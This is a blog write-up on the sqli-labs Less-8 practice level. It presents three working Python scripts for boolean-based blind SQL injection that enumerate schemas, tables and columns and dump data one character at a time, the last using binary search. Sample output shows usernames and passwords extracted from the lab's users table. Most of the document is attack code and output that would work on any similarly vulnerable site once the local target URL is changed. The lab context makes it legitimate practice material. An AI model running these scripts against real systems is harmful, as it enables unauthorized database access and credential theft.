sql-labs less-8 python script

The following is the Python script I wrote for Less-8 of sqli-labs, a boolean-based blind SQL injection level: the page prints "You are in..." when the injected condition is true and nothing otherwise, so every fact about the database has to be extracted one yes/no question at a time.

Alas, it took a long time to debug

Python's loops have no braces, so when writing nested loops you must keep track of which loop is nested in which and get the indentation exactly right. Otherwise the script runs without reporting an error but produces the wrong result (╬▔皿▔)╯

import requests

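header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    # the original value had stray spaces ("xhtml + xml"), which is not a valid media type
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8'
}
database_length = 0
database_name = ''
table_counts = 0
table_length = 0
table_name = ''
column_counts = 0
column_length = 0
column_name = ''
information_counts = 0
information_length = 0
information_name = ''
# Endpoint and injected value are kept apart so that `requests` URL-encodes the
# payload; gluing it onto "?id=1'" unencoded breaks as soon as a probe contains
# '#', '&', '%' or '+'.
base_url = "http://127.0.0.1/sql-labs/Less-8/"
inject_prefix = "1'"
# Less-8 prints this marker only when the injected condition is true. It is the
# entire boolean-blind oracle: every question below reduces to "is it there?".
TRUE_MARK = 'You are in..........'
# Candidate byte values: all printable ASCII. The original range(65, 123) had no
# digits or punctuation, so 'admin1' came back as 'admin' and 'p@ssword' as 'pssword'.
CHARSET = range(32, 127)
MAX_LENGTH = 64   # longest name/value the length search can find
MAX_COUNT = 100   # largest table/column/row count the count search can find


def is_true(condition):
    """Ask the oracle whether the SQL boolean *condition* holds.

    The condition is appended to the closed quote with ``and`` and the tail of
    the server's query is commented out with ``-- `` (MySQL requires the
    trailing space; requests encodes it as '+', which the page decodes back).
    """
    payload = f"{inject_prefix} and {condition} -- "
    response = requests.get(base_url, params={'id': payload}, headers=header, timeout=10)
    return TRUE_MARK in response.text


def brute_count(expr):
    """Return the integer value of scalar SQL *expr* in [0, MAX_COUNT), or 0 if not found."""
    for value in range(MAX_COUNT):
        if is_true(f"({expr})={value}"):
            return value
    return 0


def brute_length(expr):
    """Return length(*expr*) in [1, MAX_LENGTH], or 0 for NULL, empty or out of range."""
    for value in range(1, MAX_LENGTH + 1):
        if is_true(f"length(({expr}))={value}"):
            return value
    return 0


def brute_string(expr):
    """Recover the string value of scalar SQL *expr* one character at a time.

    Characters are compared via ascii() instead of a quoted literal: the
    comparison is then exact (under MySQL's default collation 'A'='a' is true,
    which is why the original had to lower() every result) and no probed
    character is ever spliced into the URL. A position that matches nothing in
    CHARSET becomes '?' rather than silently shortening the result.
    """
    found = []
    for position in range(1, brute_length(expr) + 1):
        for code in CHARSET:
            if is_true(f"ascii(substr(({expr}),{position},1))={code}"):
                found.append(chr(code))
                break
        else:
            found.append('?')
    return ''.join(found)


# Current database
database_name = brute_string("database()")
database_length = len(database_name)
# Tables of the current database. table_schema=database() replaces the
# hard-coded 'security' so the script follows whatever database it lands in.
tables_where = "table_schema=database()"
table_counts = brute_count(f"select count(table_name) from information_schema.tables where {tables_where}")
for i in range(1, table_counts + 1):
    # LIMIT offsets are 0-based: the original's `limit {i},1` with i starting at 1
    # skipped the first table and produced an empty trailing one.
    table_expr = f"select table_name from information_schema.tables where {tables_where} limit {i - 1},1"
    table_name = brute_string(table_expr)
    table_length = len(table_name)
    print(f'The name of table {i} is: ' + table_name)
    # Refer to the table by subquery so the recovered name is never quoted into SQL.
    columns_where = f"table_schema=database() and table_name=({table_expr})"
    column_counts = brute_count(f"select count(column_name) from information_schema.columns where {columns_where}")
    for b in range(1, column_counts + 1):
        column_expr = f"select column_name from information_schema.columns where {columns_where} limit {b - 1},1"
        column_name = brute_string(column_expr)
        column_length = len(column_name)
        print(f'The name of column {b} is: ' + column_name)
        # Rows of that column; identifiers are backtick-quoted in case a name is a reserved word.
        information_counts = brute_count(f"select count(`{column_name}`) from `{table_name}`")
        for y in range(1, information_counts + 1):
            information_name = brute_string(f"select `{column_name}` from `{table_name}` limit {y - 1},1")
            information_length = len(information_name)
            print(f'The name of data {y} is: ' + information_name)
print('The database name is: ' + database_name)
print('The number of tables in this database is:' + str(table_counts))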

Output:

E:\python\python.exe "D:\python\test1\aql-labs\less-8 three.py"
The name of Table 1 is: referers
The name of column 1 is: referer
The name of column 2 is: ip_address
Column 3 is named:
The name of Table 2 is: uagents
The name of column 1 is: uagent
The name of column 2 is: ip_address
The name of column 3 is: username
Column 4 is named:
The name of Table 3 is: users
The name of column 1 is: username
The name of data 1 is: angelina
The name of data 2 is: dummy
The name of data 3 is: secure
The name of data 4 is: stupid
The name of data 5 is: superman
The name of data 6 is: batman
The name of data 7 is: admin
The name of data 8 is: admin
The name of data 9 is: admin
The name of data 10 is: admin
The name of data 11 is: dhakkan
The name of data 12 is: admin
The name of data 13 is:
The name of column 2 is: password
The name of data 1 is: ikillyou
The name of data 2 is: pssword
The name of data 3 is: crappy
The name of data 4 is: stupidity
The name of data 5 is: genius
The name of data 6 is: moble
The name of data 7 is: admin
The name of data 8 is: admin
The name of data 9 is: admin
The name of data 10 is: admin
The name of data 11 is: dumbo
The name of data 12 is: admin
The name of data 13 is:
Column 3 is named:
The name of data 1 is:
The name of data 2 is:
The name of data 3 is: 

This was my first attempt, so the code is rough, and the output above shows two bugs: the first table (emails) and the first row of every table are skipped because LIMIT offsets are 0-based while the loops start at 1, which is also why each listing ends with an empty entry; and the candidate character range 65–122 contains no digits or punctuation, so 'admin1' prints as 'admin', 'p@ssword' as 'pssword' and 'I-kill-you' as 'ikillyou'.

I also came across a script that is considerably better than mine:

# 1. Set the global variables DIS and list, which control whether probe URLs are printed and define the ASCII codes to brute-force
# 2. Brute-force the length of the current database name
# 3. Define the length brute-force function Brute_length()
# 4. Brute-force the current database name
# 5. Define the database-name brute-force function Brute_database()
# 6. Brute-force the total length of all database names
# 7. Brute-force all database names
# 8. Brute-force table names
# 9. Define the table-name brute-force function Brute_table()
# 10. Brute-force column names
# 11. Define the column brute-force function Brute_column()
# 12. Dump data
# 13. Define the data dump function data_dump()

import sys
import time

import requests

# 1. Set global variables DIS and list to control the display of detailed information and define the ASCII codes that need to be blasted.
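# Print every probe URL when True; sql_Inject() overwrites it from its `display` argument.
DIS=True
# Candidate byte values for the character brute force, most likely first:
# ',' '.' '_' and digits (group_concat separators and name suffixes), then a-z, then @ and A-Z.
# NOTE: the name shadows the builtin `list`; it is kept because every Brute_* function
# and data_dump() below read the charset through this global.
list = [44, 46, 95, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58]
list.extend(range(97, 123))
list.extend(range(64, 91))
# The original then appended range(33, 76), which re-added most of the codes above
# (each duplicate costs one wasted request per unmatched position) and still left
# out ' ', [ \ ] ^ ` { | } ~ — any value containing one of those was truncated.
# Append every remaining printable ASCII code exactly once instead.
list.extend([code for code in range(32, 127) if code not in list])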

def sql_Inject(url, flag, display):
    """Interactive driver: current database -> all databases -> tables -> columns -> data.

    Args:
        url: injection point, e.g. ``http://127.0.0.1/sql-labs/Less-8/?id=1``.
        flag: bytes that appear in the response only when the injected condition is true.
        display: when True every probe URL is printed (stored in the global DIS).
    """
    global DIS
    DIS = display

    # Current database: its length first, then the name character by character.
    current_length = Brute_length(url, flag, current=True)
    print("Current database length:", current_length)
    current_database_name = Brute_database(url, current_length, flag, current=True)
    print("Current database name:", current_database_name)

    # All schemas as one group_concat string (only on request, it is slow).
    length = Brute_length(url, flag)
    print("Database full length:", length)
    if input("Brute all the databases?[yes/no]: ") == 'yes':
        print("Database name:", Brute_database(url, length, flag))

    # Each of the following stages repeats until the user answers exactly "no".
    answer = ""
    while answer != "no":
        choose_database = input("choose the database: ")
        table_name = Brute_table(url, choose_database, flag)
        print("Database: %s" % choose_database)
        print("Table: %s" % table_name)
        print('')
        answer = input("continue brute the tables?[yes/no]: ")

    answer = ""
    while answer != "no":
        choose_database = input("choose the database: ")
        choose_table = input("choose the table: ")
        column_name = Brute_column(url, choose_database, choose_table, flag)
        print("Table: %s.%s" % (choose_database, choose_table))
        print("Field: %s" % column_name)
        print('')
        answer = input("continue brute the columns?[yes/no]: ")

    answer = ""
    while answer != "no":
        choose_database = input("choose the database: ")
        choose_table = input("choose the table: ")
        choose_column = input("choose the column: ")
        data = data_dump(url, choose_database, choose_table, choose_column, flag)
        print("Field: %s.%s.%s" % (choose_database, choose_table, choose_column))
        print("data: %s" % data)
        print('')
        answer = input("continue dump the data?[yes/no]: ")


# 13. Define the data blasting function data_dump()
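def data_dump(url, database, table, column, flag, *, get=None, charset=None, verbose=None):
    """Dump ``group_concat(column)`` of ``database.table`` through the boolean oracle.

    Args:
        url: injection point, e.g. ``http://127.0.0.1/sql-labs/Less-8/?id=1``
            (the closing quote is appended here).
        database, table, column: identifiers spliced verbatim into the query;
            they come from the operator and are neither quoted nor validated.
        flag: bytes that appear in the response only when the condition is true.
        get: HTTP getter ``get(url, timeout=...) -> response`` with ``.content``;
            defaults to ``requests.get``. Injectable so the function can be tested offline.
        charset: iterable of byte values to try per position; defaults to the
            module-level ``list``.
        verbose: print every probe URL; defaults to the module-level ``DIS``.

    Returns:
        The recovered string. A position that matches nothing in *charset* is
        emitted as '?' instead of being dropped, so the result keeps its alignment.
        An empty or NULL result yields "".

    Note:
        group_concat() is capped by MySQL's group_concat_max_len (1024 by
        default), so large result sets are truncated server-side.
    """
    if get is None:
        get = requests.get
    if charset is None:
        charset = list
    if verbose is None:
        verbose = DIS

    def oracle(condition):
        # "-- + " comments out the rest of the server's query; MySQL needs a space
        # after "--" and the '+' survives as that space through URL decoding.
        probe = url + "' and " + condition + " -- + "
        if verbose:
            print(probe)
        return flag in get(probe, timeout=10).content

    expr = "(select group_concat(%s) from %s.%s)" % (column, database, table)

    # The step search below cannot tell length 0 from length 1; settle it first.
    if not oracle("length(%s)>0" % expr):
        return ""

    # Length: coarse steps of 10, then refine by one.
    jump = 10
    while oracle("length(%s)>%d" % (expr, jump)):
        jump += 10
    jump -= 10
    length = 1
    while oracle("length(%s)>%d" % (expr, jump + length)):
        length += 1
    data_length = jump + length

    # One ord() equality probe per candidate per position.
    found = []
    for position in range(1, data_length + 1):
        for code in charset:
            if oracle("ord(substr(%s,%d,1))=%d" % (expr, position, code)):
                found.append(chr(code))
                break
        else:
            found.append('?')
    return ''.join(found)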


# 11. Define field blasting function Brute_column()
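def Brute_column(url, database, table, flag, *, get=None, charset=None, verbose=None):
    """Recover the comma-separated column names of ``database.table``.

    The probed value is group_concat(column_name) from information_schema.columns
    for that schema and table; its length is found by stepping up in tens and
    then by ones, and each character by an ord() equality probe per candidate.

    Args:
        url: injection point (the closing quote is appended here).
        database, table: spliced into quoted SQL literals verbatim; they are
            operator input, so a name containing a quote breaks the query.
        flag: bytes present only in a true-condition response.
        get: ``get(url, timeout=...) -> response`` with ``.content``; defaults
            to ``requests.get``. Injectable for offline testing.
        charset: byte values to try per position; defaults to the module-level ``list``.
        verbose: print every probe URL; defaults to the module-level ``DIS``.

    Returns:
        The recovered column list; an unmatched position becomes '?' rather
        than being dropped, and an empty/NULL result yields "". Subject to
        MySQL's group_concat_max_len truncation (1024 bytes by default).
    """
    if get is None:
        get = requests.get
    if charset is None:
        charset = list
    if verbose is None:
        verbose = DIS

    def oracle(condition):
        probe = url + "' and " + condition + " -- + "
        if verbose:
            print(probe)
        return flag in get(probe, timeout=10).content

    expr = ("(select group_concat(column_name) from information_schema.columns "
            "where table_schema='%s' and table_name='%s')") % (database, table)

    # The step search cannot distinguish length 0 from 1; settle it first.
    if not oracle("length(%s)>0" % expr):
        return ""
    jump = 10
    while oracle("length(%s)>%d" % (expr, jump)):
        jump += 10
    jump -= 10
    length = 1
    while oracle("length(%s)>%d" % (expr, jump + length)):
        length += 1

    found = []
    for position in range(1, jump + length + 1):
        for code in charset:
            if oracle("ord(substr(%s,%d,1))=%d" % (expr, position, code)):
                found.append(chr(code))
                break
        else:
            found.append('?')
    return ''.join(found)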


# 9. Define the table name blasting function Brute_table()
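def Brute_table(url, database, flag, *, get=None, charset=None, verbose=None):
    """Recover the comma-separated table names of schema *database*.

    The probed value is group_concat(table_name) from information_schema.tables
    for that schema; its length is found by stepping up in tens and then by
    ones, and each character by an ord() equality probe per candidate.

    Args:
        url: injection point (the closing quote is appended here).
        database: spliced into a quoted SQL literal verbatim (operator input).
        flag: bytes present only in a true-condition response.
        get: ``get(url, timeout=...) -> response`` with ``.content``; defaults
            to ``requests.get``. Injectable for offline testing.
        charset: byte values to try per position; defaults to the module-level ``list``.
        verbose: print every probe URL; defaults to the module-level ``DIS``.

    Returns:
        The recovered table list; an unmatched position becomes '?' rather than
        being dropped, and an empty/NULL result yields "". Subject to MySQL's
        group_concat_max_len truncation (1024 bytes by default).
    """
    if get is None:
        get = requests.get
    if charset is None:
        charset = list
    if verbose is None:
        verbose = DIS

    def oracle(condition):
        probe = url + "' and " + condition + " -- + "
        if verbose:
            print(probe)
        return flag in get(probe, timeout=10).content

    expr = ("(select group_concat(table_name) from information_schema.tables "
            "where table_schema='%s')") % database

    # The step search cannot distinguish length 0 from 1; settle it first.
    if not oracle("length(%s)>0" % expr):
        return ""
    jump = 10
    while oracle("length(%s)>%d" % (expr, jump)):
        jump += 10
    jump -= 10
    length = 1
    while oracle("length(%s)>%d" % (expr, jump + length)):
        length += 1

    found = []
    for position in range(1, jump + length + 1):
        for code in charset:
            if oracle("ord(substr(%s,%d,1))=%d" % (expr, position, code)):
                found.append(chr(code))
                break
        else:
            found.append('?')
    return ''.join(found)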


# 5. Define the database name blasting function Brute_database()
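def Brute_database(url, length, flag, current=False, *, get=None, charset=None, verbose=None):
    """Recover the current database name, or the group_concat of all schema names.

    Args:
        url: injection point (the closing quote is appended here).
        length: number of characters to recover, as returned by Brute_length().
        flag: bytes present only in a true-condition response.
        current: True probes database(); False probes
            group_concat(schema_name) from information_schema.schemata.
        get: ``get(url, timeout=...) -> response`` with ``.content``; defaults
            to ``requests.get``. Injectable for offline testing.
        charset: byte values to try per position. Defaults to a-z for the
            current database (as the original did) and to the module-level
            ``list`` otherwise.
        verbose: print every probe URL; defaults to the module-level ``DIS``.

    Returns:
        The recovered name(s), exactly *length* characters long; a position
        that matches nothing in *charset* becomes '?' instead of being dropped.
    """
    if get is None:
        get = requests.get
    if verbose is None:
        verbose = DIS
    if current:
        expr = "database()"
        if charset is None:
            charset = range(97, 123)
    else:
        expr = "(select group_concat(schema_name) from information_schema.schemata)"
        if charset is None:
            charset = list

    found = []
    for position in range(1, length + 1):
        for code in charset:
            # ord() comparison: exact match, and no probed character is ever quoted into the URL.
            probe = url + "' and ord(substr(%s,%d,1))=%d -- + " % (expr, position, code)
            if verbose:
                print(probe)
            if flag in get(probe, timeout=10).content:
                found.append(chr(code))
                break
        else:
            found.append('?')
    return ''.join(found)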


# 3. Define the database length blasting function Brute_length()
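def Brute_length(url, flag, current=False, *, get=None, verbose=None):
    """Return length(database()) (current=True) or the length of the
    group_concat of all schema names (current=False).

    The current-database path counts up one at a time (names are short); the
    all-schemas path steps by ten first and then refines by one, because that
    string is usually dozens of characters long.

    Args:
        url: injection point (the closing quote is appended here).
        flag: bytes present only in a true-condition response.
        current: which value to measure, see above.
        get: ``get(url, timeout=...) -> response`` with ``.content``; defaults
            to ``requests.get``. Injectable for offline testing.
        verbose: print every probe URL; defaults to the module-level ``DIS``.

    Returns:
        The length as an int; 0 for an empty or NULL value (the original
        reported 1 in that case, because its ">n" search started at 1).
    """
    if get is None:
        get = requests.get
    if verbose is None:
        verbose = DIS

    def oracle(condition):
        probe = url + "' and " + condition + " -- + "
        if verbose:
            print(probe)
        return flag in get(probe, timeout=10).content

    if current:
        if not oracle("length(database())>0"):
            return 0
        length = 1
        while oracle("length(database())>%d" % length):
            length += 1
        return length

    expr = "(select group_concat(schema_name) from information_schema.schemata)"
    if not oracle("length(%s)>0" % expr):
        return 0
    jump = 10
    while oracle("length(%s)>%d" % (expr, jump)):
        jump += 10
    jump -= 10
    length = 1
    while oracle("length(%s)>%d" % (expr, jump + length)):
        length += 1
    return length + jump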

if __name__ == "__main__":
    display = False                                 # True echoes every probe URL
    flag = b'You are in...'                         # printed only for a true condition
    url = "http://127.0.0.1/sql-labs/Less-8/?id=1"  # local sqli-labs Less-8 target
    sql_Inject(url=url, flag=flag, display=display)

Output:

E:\python\python.exe D:\python\test1\aql-labs\less-8.py
Current database length: 8
Current database name: security
Database full length: 67
Brute all the databases?[yes/no]: yes
Database name: information_schema,challenges,mysql,performance_schema,security,sys
choose the database: security
Database:security
Table: emails,referers,uagents,users

continue brute the tables?[yes/no]: no
choose the database: security
choose the table: users
Table: security.users
Fields: id, username, password

continue brute the columns?[yes/no]: no
choose the database: security
choose the table: users
choose the column: username,password
Fields: security.users.username,password
Data: DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4

continue dump the data?[yes/no]: no

Process ended with exit code 0

The difference in quality is obvious.

However, both scripts still brute-force each character linearly, trying candidates one at a time, which is slow: a binary search over the printable ASCII range 32–126 needs about 7 requests per character instead of up to 95. The script below does that (a "dichotomy", i.e. bisection, search).

import requests


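def decide(*, url="http://127.0.0.1/sql-labs/Less-8/?id=1", get=None):
    """Return the number of decimal digits in length(database()) via binary search.

    Each step asks one question, ``length(length(database()))>mid``, and
    narrows [0, 9] until a single value remains (at most 4 requests). The
    original asked a '>' and a '<' question per step and fell through to an
    implicit None when neither fired.

    Args:
        url: injection point; the closing quote is appended here.
        get: ``get(url, timeout=...) -> response`` with ``.text``; defaults to
            ``requests.get``. Injectable for offline testing.
    """
    if get is None:
        get = requests.get
    low, high = 0, 9
    while low < high:
        middle = (low + high) // 2
        probe = f"{url}' and length(length(database()))>{middle} -- + "
        if 'You are in..........' in get(probe, timeout=10).text:
            low = middle + 1
        else:
            high = middle
    return low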


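def ruler(size, *, url="http://127.0.0.1/sql-labs/Less-8/?id=1", get=None):
    """Return length(database()), given that it has *size* decimal digits.

    Binary-searches the value directly in [0, 10**size) with one
    ``length(database())>mid`` question per step, instead of searching each
    digit separately and re-widening the range to 0..126 after every digit as
    the original did (same result, fewer requests).

    Args:
        size: digit count from decide(); must be >= 1.
        url: injection point; the closing quote is appended here.
        get: ``get(url, timeout=...) -> response`` with ``.text``; defaults to
            ``requests.get``. Injectable for offline testing.

    Raises:
        ValueError: if size < 1 (the original died on int('') in that case).
    """
    if size < 1:
        raise ValueError("size must be >= 1 (the digit count from decide())")
    if get is None:
        get = requests.get
    low, high = 0, 10 ** size - 1
    while low < high:
        middle = (low + high) // 2
        probe = f"{url}' and length(database())>{middle} -- + "
        if 'You are in..........' in get(probe, timeout=10).text:
            low = middle + 1
        else:
            high = middle
    return low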


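def process(length, *, url="http://127.0.0.1/sql-labs/Less-8/?id=1", get=None):
    """Recover the *length* characters of database() with a binary search per position.

    Each position costs about 7 requests (``ascii(substr(database(),i,1))>mid``
    over printable ASCII 32..126) instead of up to 95 equality probes. The
    partial result is printed after every character, as in the original. A
    character outside 32..126 resolves to the nearer range edge rather than
    being skipped, so the returned string always has *length* characters.

    Args:
        length: number of characters, as returned by ruler().
        url: injection point; the closing quote is appended here.
        get: ``get(url, timeout=...) -> response`` with ``.text``; defaults to
            ``requests.get``. Injectable for offline testing.
    """
    if get is None:
        get = requests.get
    result = ''
    for position in range(1, length + 1):
        low, high = 32, 126
        while low < high:
            middle = (low + high) // 2
            probe = f"{url}' and ascii(substr(database(), {position}, 1))>{middle} -- + "
            if 'You are in..........' in get(probe, timeout=10).text:
                low = middle + 1
            else:
                high = middle
        result += chr(low)
        print(result)
    return result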


if __name__ == '__main__':
    # Three stages: digit count of the length, the length itself, then the
    # name character by character (process() prints the partial result as it goes).
    size = decide()
    length = ruler(size)
    result = process(length)

This is only the part that recovers the current database name; the same binary search applies to every other step (table names, columns, data). The output is:

sec
secu
secur
securi
securit
security

Process ended with exit code 0